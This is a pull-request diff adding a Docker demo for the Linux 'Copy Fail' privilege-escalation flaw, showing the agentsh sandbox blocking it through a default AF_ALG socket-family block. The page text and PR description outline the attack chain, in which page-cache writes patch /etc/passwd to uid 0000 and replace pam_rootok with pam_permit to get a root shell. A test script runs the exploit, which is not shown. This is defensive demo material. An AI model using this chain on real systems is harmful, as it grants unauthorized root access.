+  .badge{{font-size:11px;font-weight:700;letter-spacing:.08em;text-transform:uppercase;padding:4px 12px;border-radius:6px}}
+  .badge-fix{{background:rgba(79,163,106,.12);color:var(--green2);border:1px solid rgba(79,163,106,.25)}}
+  .zc-title{{font-family:'DM Serif Display',serif;font-size:clamp(18px,2.5vw,24px);font-weight:400;color:var(--txt);letter-spacing:-.01em}}
+  .zc-card{{background:#1a1b26;border-radius:var(--r);border:1px solid var(--border2);overflow:hidden;box-shadow:0 4px 24px rgba(7,17,13,.1)}}
+  .zc-card-header{{display:flex;align-items:center;gap:10px;padding:14px 20px;border-bottom:1px solid rgba(255,255,255,.07);background:rgba(255,255,255,.03)}}
+  .zc-card-title{{font-family:'JetBrains Mono',monospace;font-size:12px;color:#7dcfff;font-weight:500}}
+  .zc-card-body{{padding:20px 24px;font-family:'JetBrains Mono',monospace;font-size:12.5px;line-height:1.75;color:#a9b1d6;white-space:pre;overflow-x:auto}}
+  .zc-fact{{margin-top:16px;padding:14px 18px;background:rgba(14,74,51,.06);border:1px solid rgba(14,74,51,.15);border-radius:var(--rs);font-size:13px;color:var(--txt2);line-height:1.65}}
+  .zc-fact code{{background:rgba(14,74,51,.1);padding:1px 5px;border-radius:4px;font-size:.85em}}
+  .section{{max-width:1024px;margin:0 auto;padding:48px 24px 64px}}
+  .section-label{{display:flex;align-items:center;gap:10px;margin-bottom:12px}}
+  .badge-vuln{{background:rgba(200,106,62,.12);color:var(--red);border:1px solid rgba(200,106,62,.25)}}
+  .section-title{{font-family:'DM Serif Display',serif;font-size:clamp(20px,3vw,28px);font-weight:400;color:var(--txt);letter-spacing:-.01em}}
+  .section-desc{{font-size:14px;color:var(--muted);max-width:640px;margin:8px 0 20px;line-height:1.65}}
+  .section-desc code{{background:rgba(14,74,51,.08);padding:1px 5px;border-radius:4px;font-size:.85em}}
+  .player-wrap{{border-radius:var(--r);overflow:hidden;border:1px solid var(--border2);background:#1a1b26;box-shadow:0 20px 60px rgba(7,17,13,.18);transition:border-color .3s}}
+  .player-wrap:hover{{border-color:var(--green)}}
+  .player-wrap.fix:hover{{border-color:var(--green2)}}
+  .verdict{{text-align:center;padding:14px 20px;font-family:'JetBrains Mono',monospace;font-size:13px;font-weight:700;letter-spacing:.06em;text-transform:uppercase}}
+  .verdict-vuln{{color:#f7768e;border-top:1px solid rgba(247,118,142,.2);background:rgba(247,118,142,.04)}}
+  .verdict-fix{{color:#9ece6a;border-top:1px solid rgba(158,206,106,.2);background:rgba(158,206,106,.04)}}
+  footer{{border-top:1px solid var(--border);padding:32px 24px;text-align:center}}
+  .footer-inner{{max-width:1024px;margin:0 auto;display:flex;flex-direction:column;align-items:center;gap:16px}}
+  .footer-links{{display:flex;gap:20px;flex-wrap:wrap;justify-content:center;font-size:13px}}
+  .footer-links a{{color:var(--muted);transition:color .2s}}
+  .footer-links a:hover{{color:var(--green)}}
+  .footer-copy{{font-size:12px;color:var(--faint)}}
+  .yaml-key{{color:#7aa2f7}}.yaml-val{{color:#9ece6a}}.yaml-str{{color:#e0af68}}
+  .yaml-bool{{color:#bb9af7}}.yaml-cmt{{color:#565f89;font-style:italic}}
+  @media(max-width:640px){{.hero{{padding:60px 16px 24px}}.section{{padding:32px 16px 48px}}.zero-config{{padding:0 16px 32px}}.nav-links{{display:none}}}}
+</style>
+</head>
+<body>
+<div class="bg-grad"></div>
+<nav>
+  <div class="nav-inner">
+    <div class="nav-left">
+      <a href="https://www.agentsh.org/" class="nav-logo">
+        <div class="nav-logo-icon"><svg width="14" height="14" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><polyline points="4 17 10 11 4 5"></polyline><line x1="12" y1="19" x2="20" y2="19"></line></svg></div>
+        <span class="nav-logo-text">agentsh</span>
+      </a>
+      <div class="nav-sep"></div>
+      <a href="https://www.canyonroad.ai/" class="nav-cr-link" style="display:flex;align-items:center;gap:8px;"><span class="nav-cr-text">Canyon Road</span></a>
+    </div>
+    <div class="nav-links">
+      <a href="https://copy.fail/" target="_blank" rel="noopener">copy.fail Advisory</a>
+      <a href="https://github.com/canyonroad/agentsh" target="_blank" rel="noopener">GitHub</a>
+      <a href="https://www.agentsh.org/" target="_blank" rel="noopener">agentsh.org</a>
+    </div>
+  </div>
+</nav>
+<section class="hero">
+  <div style="display:flex;justify-content:center;gap:8px;margin-bottom:20px;"><span class="badge-cve">CVE-2026-31431</span></div>
+  <h1 class="hero-title">Copy Fail &mdash; <span class="accent">Before &amp; After</span></h1>
+  <p class="hero-subtitle">
+    A logic flaw in <code>algif_aead</code>/<code>authencesn</code> lets any unprivileged
+    user deterministically write 4 bytes into any file&rsquo;s page cache. Chained through
+    <code>/etc/passwd</code> and <code>/etc/pam.d/su</code>, it produces a no-password
+    root shell &mdash; 732 bytes of Python, no races, no offsets.
+  </p>
+  <div class="hero-links">
+    <a href="https://copy.fail/" target="_blank" rel="noopener">copy.fail advisory &rarr;</a>
+    <a href="https://xint.io/blog/copy-fail-linux-distributions" target="_blank" rel="noopener">Technical write-up &rarr;</a>
+    <a href="https://www.agentsh.org/" target="_blank" rel="noopener">Install agentsh &rarr;</a>
+  </div>
+</section>
+<div class="zero-config">
+  <div class="zc-header">
+    <span class="badge badge-fix">Zero configuration</span>
+    <h2 class="zc-title">agentsh blocked this before the CVE was disclosed.</h2>
+  </div>
+  <div class="zc-card">
+    <div class="zc-card-header">
+      <svg width="14" height="14" viewBox="0 0 24 24" fill="none" stroke="#7dcfff" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path><polyline points="14 2 14 8 20 8"></polyline></svg>
+      <span class="zc-card-title">config.yml &mdash; the complete agentsh configuration for this demo</span>
+    </div>
+    <div class="zc-card-body"><span class="yaml-cmt"># AF_ALG (family 38) is in DefaultBlockedFamilies() — no custom rule needed.
+# agentsh blocked Copy Fail before the CVE was disclosed.</span>
+
+<span class="yaml-key">sandbox</span>:
+  <span class="yaml-key">seccomp</span>:
+    <span class="yaml-key">enabled</span>: <span class="yaml-bool">true</span>
+    <span class="yaml-cmt"># blocked_socket_families is NOT set.</span>
+    <span class="yaml-cmt"># DefaultBlockedFamilies() includes AF_ALG automatically.</span>
+    <span class="yaml-cmt"># Nothing else to configure.</span></div>
+  </div>
+  <div class="zc-fact">
+    <code>AF_ALG</code> (socket family&nbsp;38) has been in agentsh&rsquo;s <code>DefaultBlockedFamilies()</code>
+    since the feature shipped &mdash; alongside <code>AF_VSOCK</code>, <code>AF_RDS</code>,
+    <code>AF_TIPC</code>, and other rarely-needed kernel facilities. The Copy Fail exploit
+    must call <code>socket(AF_ALG, SOCK_SEQPACKET, 0)</code> as its very first operation.
+    agentsh returns <code>EAFNOSUPPORT</code> before <code>write4()</code> ever fires.
+    <code>/etc/passwd</code> and <code>/etc/pam.d/su</code> are never touched.
+  </div>
+</div>
+<section class="section">
+  <div class="section-label"><span class="badge badge-vuln">Before</span><h2 class="section-title">Bare exploit &mdash; no agentsh</h2></div>
+  <p class="section-desc">
+    Alice (uid=1000) patches <code>/etc/passwd</code> (uid&nbsp;&rarr;&nbsp;0000) and
+    <code>/etc/pam.d/su</code> (<code>pam_rootok.so</code>&nbsp;&rarr;&nbsp;<code>pam_permit.so</code>)
+    in page cache. Nothing is written to disk. <code>su alice</code> drops into a root shell
+    with no password. <code>/tmp/OWNED-BY-ALICE</code> is written as uid=0.
+  </p>
+  <div class="player-wrap"><div id="player-vuln"></div><div class="verdict verdict-vuln">VERDICT: EXPLOIT SUCCEEDED</div></div>
+</section>
+<section class="section">
+  <div class="section-label"><span class="badge badge-fix">After</span><h2 class="section-title">Same exploit under agentsh</h2></div>
+  <p class="section-desc">
+    agentsh&rsquo;s default <code>blocked_socket_families</code> returns
+    <code>EAFNOSUPPORT</code> at <code>socket(AF_ALG,&nbsp;...)</code>.
+    The exploit tracebacks immediately. <code>/etc/passwd</code> still shows uid=1000.
+    No marker file. No write. Zero custom configuration required.
+  </p>
+  <div class="player-wrap fix"><div id="player-agentsh"></div><div class="verdict verdict-fix">VERDICT: BLOCKED &mdash; zero config</div></div>
+</section>
+<footer>
+  <div class="footer-inner">
+    <div class="footer-links">
+      <a href="https://copy.fail/" target="_blank" rel="noopener">copy.fail Advisory</a>
+      <a href="https://xint.io/blog/copy-fail-linux-distributions" target="_blank" rel="noopener">Technical write-up</a>
+      <a href="https://www.agentsh.org/" target="_blank" rel="noopener">agentsh.org</a>
+      <a href="https://www.canyonroad.ai/" target="_blank" rel="noopener">Canyon Road</a>
+      <a href="https://github.com/canyonroad/agentsh" target="_blank" rel="noopener">GitHub</a>
+    </div>
+    <p class="footer-copy">&copy; 2026 Canyon Road Technologies Inc. &middot; agentsh is Apache 2.0</p>
+  </div>
+</footer>
+<script type="text/plain" id="vuln-cast">{{vuln_cast}}</script>
+<script type="text/plain" id="agentsh-cast">{{agentsh_cast}}</script>
+<script src="https://cdn.jsdelivr.net/npm/asciinema-player@3.15.1/dist/bundle/asciinema-player.min.js"></script>
+<script>
+(function(){{
+  function loadCast(id){{return document.getElementById(id).textContent;}}
+  function urlFromCast(text){{return URL.createObjectURL(new Blob([text],{{type:"application/x-asciicast"}}));}}
+  var opts={{fit:"width",autoPlay:false,terminalFontSize:"13px",terminalLineHeight:1.4}};
+  AsciinemaPlayer.create(urlFromCast(loadCast("vuln-cast")),document.getElementById("player-vuln"),opts);
+  AsciinemaPlayer.create(urlFromCast(loadCast("agentsh-cast")),document.getElementById("player-agentsh"),opts);
+}})();
+</script>
+</body>
+</html>"""
+OUT.write_text(html)
+print(f"Written: {OUT}  ({len(html):,} bytes)")

--- a/examples/demo-cve-2026-31431/scripts/lib/config-walkthrough.txt
+++ b/examples/demo-cve-2026-31431/scripts/lib/config-walkthrough.txt
@@ -1,0 +1,22 @@
+Zero configuration required.
+
+--- pause ---
+
+agentsh's DefaultBlockedFamilies() includes AF_ALG (family 38)
+alongside AF_VSOCK, AF_RDS, AF_TIPC, and other kernel facilities
+that are almost never needed by AI agent workloads.
+
+--- pause ---
+
+Copy Fail was publicly disclosed on 2026-04-29.
+AF_ALG was added to the default block list years earlier,
+as general kernel attack-surface reduction.
+Any system running agentsh with default settings was already
+protected — before the CVE existed.
+
+--- pause ---
+
+When socket(AF_ALG, SOCK_SEQPACKET, 0) returns EAFNOSUPPORT,
+the exploit stops at line 1 of write4().
+The page-cache write never fires.
+/etc/passwd and /etc/pam.d/su are never touched.

--- a/examples/demo-cve-2026-31431/scripts/lib/io.sh
+++ b/examples/demo-cve-2026-31431/scripts/lib/io.sh
@@ -1,0 +1,42 @@
+# scripts/lib/io.sh
+if [ -z "${NO_COLOR:-}" ] && [ -t 1 ]; then
+    C_HDR=$'\033[1;36m'; C_OK=$'\033[1;32m'
+    C_FAIL=$'\033[1;31m'; C_DIM=$'\033[2m'; C_OFF=$'\033[0m'
+else
+    C_HDR=''; C_OK=''; C_FAIL=''; C_DIM=''; C_OFF=''
+fi
+PAUSE_SHORT="${PAUSE_SHORT:-1}"
+PAUSE_LONG="${PAUSE_LONG:-2}"
+
+banner() {
+    printf '\n%s%s%s\n'  "$C_HDR" "============================================================" "$C_OFF"
+    printf '%s  %s%s\n'  "$C_HDR" "$*" "$C_OFF"
+    printf '%s%s%s\n\n'  "$C_HDR" "============================================================" "$C_OFF"
+}
+step()  { printf '\n%s[%s]%s %s\n' "$C_HDR" "$1" "$C_OFF" "$2"; sleep "$PAUSE_SHORT"; }
+note()  { printf '%s    %s%s\n'    "$C_DIM" "$*" "$C_OFF"; }
+pause() { sleep "${1:-$PAUSE_LONG}"; }
+verdict_success() { printf '\n%sVERDICT: EXPLOIT SUCCEEDED — %s%s\n\n' "$C_FAIL" "$*" "$C_OFF"; }
+verdict_patched() { printf '\n%sVERDICT: KERNEL PATCHED — %s%s\n\n'    "$C_FAIL" "$*" "$C_OFF"; }
+verdict_blocked() { printf '\n%sVERDICT: BLOCKED — %s%s\n\n'           "$C_OK"   "$*" "$C_OFF"; }
+
+print_walkthrough() {
+    local file="$1" block=''
+    while IFS= read -r line || [ -n "$line" ]; do
+        if [ "$line" = '--- pause ---' ]; then
+            printf '%s%s%s\n' "$C_DIM" "$block" "$C_OFF"
+            pause; block=''
+        else
+            block="${block}${line}"$'\n'
+        fi
+    done < "$file"
+    [ -n "$block" ] && printf '%s%s%s\n' "$C_DIM" "$block" "$C_OFF"
+}
+
+show_yaml() {
+    if command -v bat >/dev/null 2>&1; then
+        bat --language yaml --paging never --style plain "$1"
+    else
+        cat "$1"
+    fi
+}

--- a/examples/demo-cve-2026-31431/scripts/verify.sh
+++ b/examples/demo-cve-2026-31431/scripts/verify.sh
@@ -1,0 +1,63 @@
+#!/bin/bash
+# scripts/verify.sh — assert success criteria.
+set -eu
+. /opt/scripts/lib/io.sh
+
+MARKER=/tmp/OWNED-BY-ALICE
+
+assert_af_alg_open() {
+    if python3 /opt/exploit/detect.py 2>&1 | grep -q "OPEN"; then
+        echo "PASS: AF_ALG socket OPEN in vuln mode"
+    else
+        echo "FAIL: AF_ALG socket not OPEN in vuln mode"
+        return 1
+    fi
+}
+
+assert_exploit_ran() {
+    python3 /opt/exploit/exploit.py; RC=$?
+    if [ $RC -eq 0 ] && [ -f "$MARKER" ]; then
+        echo "PASS: exploit wrote marker as root (exit 0)"
+    elif [ $RC -eq 2 ]; then
+        echo "PASS: kernel patched (exit 2) — AF_ALG still open, agentsh still blocks"
+    else
+        echo "FAIL: exploit.py returned unexpected exit code $RC"
+        return 1
+    fi
+}
+
+assert_af_alg_blocked() {
+    if agentsh wrap -- python3 /opt/exploit/detect.py 2>&1 | grep -q "BLOCKED"; then
+        echo "PASS: AF_ALG BLOCKED in agentsh mode"
+    else
+        echo "FAIL: AF_ALG not BLOCKED in agentsh mode"
+        return 1
+    fi
+}
+
+assert_exploit_blocked() {
+    agentsh wrap -- python3 /opt/exploit/exploit.py; RC=$?
+    if [ $RC -ne 0 ] && [ ! -f "$MARKER" ] && ! grep -q "^alice:x:0000:" /etc/passwd; then
+        echo "PASS: exploit blocked — marker absent, /etc/passwd unchanged"
+    else
+        echo "FAIL: exploit.py may have landed under agentsh"
+        return 1
+    fi
+}
+
+case "${1:-both}" in
+  vuln)
+      rm -f "$MARKER" 2>/dev/null || true
+      assert_af_alg_open
+      assert_exploit_ran ;;
+  agentsh)
+      rm -f "$MARKER" 2>/dev/null || true
+      assert_af_alg_blocked
+      assert_exploit_blocked ;;
+  both)
+      $0 vuln
+      $0 agentsh ;;
+  *)
+      echo "Usage: verify.sh [vuln|agentsh|both]" >&2
+      exit 2 ;;
+esac

--- a/examples/demo-cve-2026-31431/scripts/verify.sh
+++ b/examples/demo-cve-2026-31431/scripts/verify.sh
@@ -15,7 +15,8 @@ assert_af_alg_open() {
 }
 
 assert_exploit_ran() {
-    python3 /opt/exploit/exploit.py; RC=$?
+    RC=0
+    python3 /opt/exploit/exploit.py || RC=$?
     if [ $RC -eq 0 ] && [ -f "$MARKER" ]; then
         echo "PASS: exploit wrote marker as root (exit 0)"
     elif [ $RC -eq 2 ]; then
@@ -36,7 +37,8 @@ assert_af_alg_blocked() {
 }
 
 assert_exploit_blocked() {
-    agentsh wrap -- python3 /opt/exploit/exploit.py; RC=$?
+    RC=0
+    agentsh wrap -- python3 /opt/exploit/exploit.py || RC=$?
     if [ $RC -ne 0 ] && [ ! -f "$MARKER" ] && ! grep -q "^alice:x:0000:" /etc/passwd; then
         echo "PASS: exploit blocked — marker absent, /etc/passwd unchanged"
     else


### PR DESCRIPTION
## Summary

- Adds `examples/demo-cve-2026-31431/` — a self-contained Docker demo for CVE-2026-31431 (Copy Fail)
- Two run modes: `vuln` (bare exploit) and `agentsh` (blocked by default config)
- Includes `exploit/exploit.py` (AF_ALG + splice page-cache write → /etc/passwd + PAM patch), `detect.py`, all narration scripts, Makefile, README, and `gen_demo_html.py` for the self-contained recording page

## Key narrative: zero configuration

`AF_ALG` (family 38) has been in `DefaultBlockedFamilies()` since the feature shipped. No `socket_rules` or `blocked_socket_families` entry is needed — just `seccomp.enabled: true`. agentsh returns `EAFNOSUPPORT` at `socket(AF_ALG, ...)` before `write4()` ever fires.

**agentsh blocked Copy Fail before the CVE was publicly disclosed.**

## Bugs found and fixed during smoke testing

- `demo-vuln.sh` / `verify.sh`: `set -eu` aborted before `EXPLOIT_RC=$?` when exploit exits 2 (kernel patched) — fixed with `|| RC=$?` pattern
- `dispatch.sh`: `curl` not installed in `debian:trixie-slim` — replaced health check with `python3 urllib.request`

## Test plan

- [ ] `make -C examples/demo-cve-2026-31431 build` succeeds
- [ ] `docker run --rm --security-opt seccomp=unconfined agentsh-copyfail-demo vuln` exits 0 (EXPLOIT SUCCEEDED or KERNEL PATCHED)
- [ ] `docker run --rm --cap-add=SYS_ADMIN --cap-add=SYS_PTRACE --device=/dev/fuse --security-opt=apparmor=unconfined agentsh-copyfail-demo agentsh` exits 0 (VERDICT: BLOCKED)
- [ ] Record casts with `make -C examples/demo-cve-2026-31431 record`, then `python3 examples/demo-cve-2026-31431/scripts/gen_demo_html.py`

🤖 Generated with [Claude Code](https://claude.com/claude-code)